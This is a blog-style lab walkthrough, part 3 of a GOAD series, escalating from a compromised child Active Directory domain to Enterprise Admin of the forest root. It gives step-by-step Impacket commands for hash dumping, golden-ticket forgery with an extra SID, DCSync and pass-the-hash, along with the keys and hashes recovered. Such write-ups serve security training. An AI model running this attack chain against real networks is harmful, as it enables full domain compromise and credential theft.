GOAD Compromise Part 3: Total Forest Takeover

Published by Matt Clemons on


In Part 2, we gained SYSTEM on WINTERFELL and minted a long lived Golden Ticket for the child domain. We have total control of North, but in an Active Directory forest, the Child Domain is just a stepping stone.

Our objective now is to leverage the trust relationship between the Child (north) and the Parent (sevenkingdoms) to escalate our privileges to Enterprise Admin. We will do this without ever knowing a single cleartext password.

Environment

  • Child DC: winterfell.north.sevenkingdoms.local (192.168.66.11)
  • Root DC: kingslanding.sevenkingdoms.local (192.168.66.10)
  • Goal: Dump the hashes of the Forest Root Domain Controller.

Phase 1: Harvesting the Seed Hash

We cannot forge a ticket out of thin air. We need the cryptographic “seed” to start our chain. Since we already have SYSTEM level execution on the North DC, we can simply read the ntds.dit database to recover the Administrator’s hash.

# Extracting the North Administrator hash from Winterfell
impacket-secretsdump north.sevenkingdoms.local/administrator@192.168.66.11

Result: Administrator:500:aad3b...:31d6cfe0d16ae931b73c59d7e0c089c0:::

We now have the NT Hash (31d6cfe0d16ae931b73c59d7e0c089c0). This is the key that unlocks the rest of the attack.

Phase 2: Bridging the Trust (Raise Child)

To cross the forest boundary, we need two specific pieces of information:

  1. The AES Key for the North’s krbtgt account (to sign our tickets).
  2. The SID of the Parent Domain (to target our privileges).

We use raiseChild.py to automate this reconnaissance. 

# Using the stolen hash to gather forest keys
python3 /usr/share/doc/python3-impacket/examples/raiseChild.py \
  -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 \
  north.sevenkingdoms.local/administrator
  • Child krbtgt AES256 Key: c3fa9b0e01e744dfa3ad7d33e173bd16c889f0556ce40b292ced2c0b53221a7e
  • Parent Domain SID: S-1-5-21-987402504-3918047113-3864484823
  • Enterprise Admin RID: 519

Phase 3: Making Kerberos Deterministic

If Kali doesn’t know exactly which IP hosts which Realm, the attack will fail. We must “pin” the realms in our configuration.

Update your /etc/krb5.conf:

[libdefaults]
    default_realm = NORTH.SEVENKINGDOMS.LOCAL
    dns_lookup_kdc = false
    dns_lookup_realm = false
    rdns = false
    forwardable = true
    proxiable = true

[realms]
    NORTH.SEVENKINGDOMS.LOCAL = {
        kdc = 192.168.66.11
        admin_server = 192.168.66.11
    }
    SEVENKINGDOMS.LOCAL = {
        kdc = 192.168.66.10
        admin_server = 192.168.66.10
    }

[domain_realm]
    .north.sevenkingdoms.local = NORTH.SEVENKINGDOMS.LOCAL
    north.sevenkingdoms.local = NORTH.SEVENKINGDOMS.LOCAL
    .sevenkingdoms.local = SEVENKINGDOMS.LOCAL
    sevenkingdoms.local = SEVENKINGDOMS.LOCAL

Phase 4: Forging the “Diamond Ticket”

Now we forge a “Cross-Domain Golden Ticket.” This ticket is signed by the North (using the krbtgt key we found) but claims that the user is a member of the Forest Root’s Enterprise Admins group (via the extra-sid field).

python3 /usr/share/doc/python3-impacket/examples/ticketer.py \
  -aesKey c3fa9b0e01e744dfa3ad7d33e173bd16c889f0556ce40b292ced2c0b53221a7e \
  -domain-sid S-1-5-21-3995002436-1582307507-150598601 \
  -extra-sid S-1-5-21-987402504-3918047113-3864484823-519 \
  -domain north.sevenkingdoms.local \
  -user-id 500 \
  Administrator

This creates Administrator.ccache. We load it into our session:

export KRB5CCNAME=$(pwd)/Administrator.ccache

Phase 5: The Grand Finale (DCSYNC)

Because our ticket says we are Enterprise Admins, the Forest Root DC (Kingslanding) trusts us implicitly. We perform a DCSYNC attack, asking the Root DC to replicate its entire password database to us.

# Using the ticket (-k) to dump the Forest Root
impacket-secretsdump -k -no-pass north.sevenkingdoms.local/Administrator@kingslanding.sevenkingdoms.local

The Loot: Administrator:500:aad3b...:c5f2d015f316018f6405522825689ffe:::

Phase 6: Persistence & Verification

To finalize the takeover, we pivot from Kerberos back to NTLM. We use the recovered Root Administrator hash to spawn an interactive shell on the Forest Root DC.

# Gaining a shell via Pass-the-Hash
impacket-wmiexec -hashes :c5f2d015f316018f6405522825689ffe SEVENKINGDOMS/Administrator@192.168.66.10

# Verifying "Pwn3d!" status
nxc smb 192.168.66.10 -u Administrator -H c5f2d015f316018f6405522825689ffe

Conclusion

By chaining a compromised Child Admin hash into a cross forest forgery, we completely bypassed the security boundary of the forest.

Categories: Security

0 Comments

Leave a Reply

Avatar placeholder

Your email address will not be published. Required fields are marked *

Related Posts

Security

GOAD Compromise Part 2: System to Golden Ticket

In Part 1, we set the stage. Now we turn that control into dominance. The goal here is simple. Move from a compromised machine account in the child domain north.sevenkingdoms.local to full Enterprise Admin access Read more

Security

GOAD Compromise Part 1: Enumeration

We have access to the network, but no understanding of the environment. The next step is to enumerate and map what exists. Phase 1: Infrastructure Mapping (Nmap) We start by figuring out what actually exists Read more

Security

GOAD Compromise Part 0: Prep Kali Docker

Phase 1: System Tools & Compilers These packages provide the networking, compilation, and cross-platform headers needed for the lab. Enter blanks on all the krb5 stuff. Phase 2: Modern AD Tooling We use pipx to Read more